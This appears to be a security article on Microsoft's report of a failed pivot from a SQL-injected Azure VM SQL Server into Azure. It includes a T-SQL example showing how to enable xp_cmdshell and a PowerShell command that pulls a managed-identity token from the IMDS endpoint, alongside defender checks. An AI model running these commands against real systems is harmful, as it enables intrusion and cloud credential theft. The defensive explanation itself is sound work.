Microsoft has reported a campaign in which attackers attempted, unsuccessfully, to move laterally from a compromised SQL Server instance into the surrounding Azure cloud environment. The attempt was thwarted, but the incident shows how an ordinary web-application flaw can be turned into an attempt on cloud resources.
Attack Chain Overview:
The attackers began by exploiting a SQL injection vulnerability in an application. The injected queries ran on a Microsoft SQL Server instance deployed in an Azure Virtual Machine (VM), and the database login the application used carried elevated permissions on that instance, which gave the threat actors a foothold on the server itself.
Next, the attackers aimed to move laterally to additional cloud resources. They attempted to abuse the VM's cloud identity, which, had the attempt succeeded, would have let them act against other Azure resources with whatever permissions that identity held.
Managed Identities in Cloud Services:
Cloud services such as Azure use managed identities to give cloud resources (a VM, for example) an identity of their own. Code running on the resource obtains access tokens for that identity and uses them to authenticate to other cloud services, with no credential stored on the resource; the permissions are whatever roles have been assigned to the identity. In this instance, the attackers sought to use the managed identity attached to the VM hosting the SQL Server instance.
Attack Techniques and Progression:
The attack chain began with a SQL injection against the database server, which let the adversary gather information about the instance. They then enabled the xp_cmdshell option, an extended stored procedure that is disabled by default and, once turned on, executes operating-system commands from within T-SQL in the security context of the SQL Server service account.
Subsequently, the attackers engaged in reconnaissance, downloaded executables and PowerShell scripts, and established persistence via a scheduled task set to launch a backdoor script.
Data exfiltration was carried out through webhook[.]site, a publicly accessible service for receiving HTTP requests. Because the traffic is ordinary HTTPS to a legitimate public domain, it blends with normal outbound traffic and is less likely to be flagged.
Exploitation of Cloud Identity:
The attackers attempted to use the cloud identity of the SQL Server VM by contacting the Azure Instance Metadata Service (IMDS), reachable only from inside the VM at 169.254.169.254, and requesting an access token for the VM's managed identity. Such a token would have authenticated them to other Azure services as that identity. This was the critical step in their bid to operate against cloud resources, and it is the step that failed in this case.
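The following T-SQL is an added illustration of the chain described above and is not taken from Microsoft's report. It assumes the injected login is a member of the sysadmin role (the permission needed to enable and run xp_cmdshell) and that the Azure VM hosting SQL Server has a system-assigned managed identity enabled. The IMDS endpoint, the Metadata: true header, the api-version value and the sys.configurations and sys.server_principals catalog views are the documented Microsoft interfaces; the rest is a constructed example. The first two parts show what the attacker-side steps look like, the third part shows the checks and the rollback a defender would run.

```sql
-- Added example (not from the original report): the xp_cmdshell -> IMDS pivot,
-- followed by the defender-side checks. Assumes sysadmin on an Azure VM with a
-- system-assigned managed identity.

------------------------------------------------------------------------
-- 1. Attacker side: enabling OS command execution once an injection reaches
--    a sysadmin login. xp_cmdshell is off by default; both settings need
--    RECONFIGURE to take effect.
------------------------------------------------------------------------
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- Commands now run as the SQL Server service account on the VM.
EXEC xp_cmdshell 'whoami';

------------------------------------------------------------------------
-- 2. The cloud pivot: from inside xp_cmdshell, ask IMDS for a token for the
--    VM's managed identity. IMDS is link-local and answers only from inside
--    the VM, so no stored credential is needed; the Metadata: true header
--    is mandatory. Single quotes are doubled for T-SQL.
------------------------------------------------------------------------
EXEC xp_cmdshell 'powershell -NoProfile -Command "Invoke-RestMethod -Headers @{Metadata=''true''} -Uri ''http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/'' | ConvertTo-Json"';
-- The access_token field in the response is a bearer token for Azure Resource
-- Manager, scoped by whatever RBAC roles the VM's identity holds. Those roles,
-- not the SQL login, define the blast radius of this step.

------------------------------------------------------------------------
-- 3. Defender side.
------------------------------------------------------------------------
-- Is xp_cmdshell enabled right now? value_in_use = 1 means yes.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- Which logins could flip it? Any sysadmin reachable through an injection can.
-- An application login should not appear in this list.
SELECT name, type_desc
FROM sys.server_principals
WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1
  AND type IN ('S', 'U', 'G');   -- SQL login, Windows login, Windows group

-- Roll back: disable xp_cmdshell and hide advanced options again.
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Two points follow from the example. The IMDS request carries no secret, so the only thing standing between a command-execution primitive on the VM and a usable cloud token is whether the VM has a managed identity at all and which roles are bound to it; an identity with no role assignments yields a token that can do nothing. And because enabling xp_cmdshell requires sysadmin, the precondition for the whole chain is an application database login that holds far more privilege than the application needs.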
Conclusion:
This incident underscores the evolving complexity of cloud-based attack methodologies. The attackers in this case were actively seeking over-privileged processes, accounts, managed identities, and database connections to carry out their activities: an application login with sysadmin rights turned a SQL injection into OS command execution, and a managed identity on the VM turned OS command execution into a potential path to other Azure resources. Microsoft's disclosure is a reminder that the privileges granted to database logins, service accounts, and cloud identities, not just the exposure of the SQL Server instance itself, determine how far an intrusion like this can reach.

